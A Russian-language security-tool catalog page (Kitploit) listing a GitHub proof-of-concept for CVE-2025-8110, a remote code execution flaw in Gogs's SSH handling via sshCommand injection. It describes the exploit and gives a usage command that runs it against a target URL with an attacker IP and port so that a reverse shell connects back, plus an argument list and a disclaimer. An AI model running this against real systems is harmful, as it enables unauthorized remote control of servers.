Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
gogs-CVE-2025-8110 — CVE-2025-8110 PoC | Kitploit
Инструменты/GitHubGitHub/zabuqasem/gogs-cve-2025-8110
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеИнструмент Удаленного ДоступаРазработка Полезной Нагрузки
GitHubzabuqasem/gogs-cve-2025-8110

gogs-CVE-2025-8110

CVE-2025-8110 PoC

Репозиторий
2928 месяцев назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Gogs CVE-2025-8110 PoC

Этот репозиторий содержит Proof of Concept (PoC) для CVE-2025-8110, уязвимости удаленного выполнения кода (RCE) в Gogs. Эксплойт нацелен на внутреннюю реализацию SSH-сервера, позволяя атакующим внедрять вредоносные команды через конфигурацию sshCommand.

Использование

Для запуска эксплойта используйте скрипт CVE-2025-8110.py, указав целевой URL Gogs и ваш IP-адрес/порт для прослушивания обратной оболочки.

root@kitploit:~
python3 CVE-2025-8110.py -u <TARGET_URL> -lh <ATTACKER_IP> -lp <ATTACKER_PORT>

Аргументы

  • -u, --url: Базовый URL целевого экземпляра Gogs (например, http://localhost:3000).
  • -lh, --host: IP-адрес, на который должна подключиться обратная оболочка.
Скачать инструмент
  • -lp, --port: Порт, на который должна подключиться обратная оболочка.
  • -x, --proxy: (Необязательно) Использовать локальный прокси на http://localhost:8080 для отладки.
  • Юридическое предупреждение

    Этот Proof of Concept (PoC) предназначен только для образовательных и исследовательских целей. Он призван помочь специалистам по безопасности и администраторам понять и смягчить последствия уязвимости CVE-2025-8110.

    Автор не несет ответственности за любое несанкционированное или злонамеренное использование этого кода. Используйте этот инструмент только на системах, которыми вы владеете или на тестирование которых у вас есть явное разрешение. Используя этот код, вы соглашаетесь взять на себя полную ответственность за свои действия.